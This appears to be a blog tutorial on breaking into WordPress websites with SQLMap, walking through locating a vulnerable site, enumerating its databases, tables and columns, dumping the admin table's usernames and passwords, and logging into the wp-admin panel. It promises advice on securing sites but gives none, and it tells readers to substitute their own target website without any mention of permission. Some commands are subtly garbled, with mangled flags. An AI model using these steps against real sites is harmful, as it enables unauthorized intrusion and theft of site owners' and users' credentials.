In this modern era, internet have become the internet of things. It’s all because of world wide web. Information is shared over internet through websites. Websites have completely changed the direction of information world. Businesses are getting online, banking is happening over internet. This just have widen the information area. Besides this, it also has opened a way of threat to information.  It made a risk to confidential information as a result of cyber attacks. There are hundreds of ways to compromise security as not a single system is breach-proof. So, I am gonna show in this article, how wordpress websites can be hacked very easily and how to secure them. In this article, I will discuss the most popular way to hack a website using SQLMap. There are many methods to hack a website but I am sharing how to hack a website with SQLMap.

So, how to hack a website with SQLMap?

Before starting how to hack a website, we need few things to get started.

Requirements

  • Linux OS (I would recommend Kali Linux)
  • SQLMap (if not in your Linux pre-built)
  • WordPress Website

As you get all the required things, we move on the steps to follow to hack a website with SQLMap.

Steps


Password : BreachSec
  • First of all, make sure we have a Linux installed ready to use machine.
  • Open a terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal. 
  • Now find the vulnerable site. You can check out how to find vulnerable websites here. After finding vulnerable website, type python sqlmap.py -u http://target.com/index.php?id=4 –dbs in the sqlmap. Make sure to replace link with your target website.
  • As you hit Enter, You will get the database name of the website. 
  • Well we come to know about the database now. It’s time to get the tables from Information Schema. For that, you need to put the following command in the sqlmap.

python sqlmap.py -u http://target.com/index.php?id=4 -D  DatabaseName –tables

  • It will look like the below sceenshot in my scenario. 
  • This will give us the list of all the tables in the target database. 
  • As you can see, we got all the tables of the target database, now we need to predict which table might be getting used for users or admins. In the most of cases, admin and users table contains the administrator login info. As you can see we have a teble named as admin. Now we will try to get it’s columns. To get the columns, type the following command in the sqlmap.

python sqlmap.py -u http://target.com/index.php?id=4 -T admin –columns

  • After hitting Enter, we get columns of the admin table. 
  • Well here luckily we got username and password columns. Now we try to get username and passwords of the admin table. To do that, simply type the following command.

python sqlmap.py -u http://target.com/index.php?id=4 -T admin -U test –dump

  • Wow..!! We got the admin username and password of the wordpress website here. 
  • Finally we have username and password. Now just type the target’s admin URL and just use the grabbed username and password to login. WordPress admin panel URL would look like.

http://target.com/wp-admin

That’s all..! Hope it will work for you. This is all how to hack a website with SQLMap. If you encounter any problem, feel free to comment below.


Note: Use Virtual Machine and scan on VirusTotal before downloading any program on Host Machine for your privacy.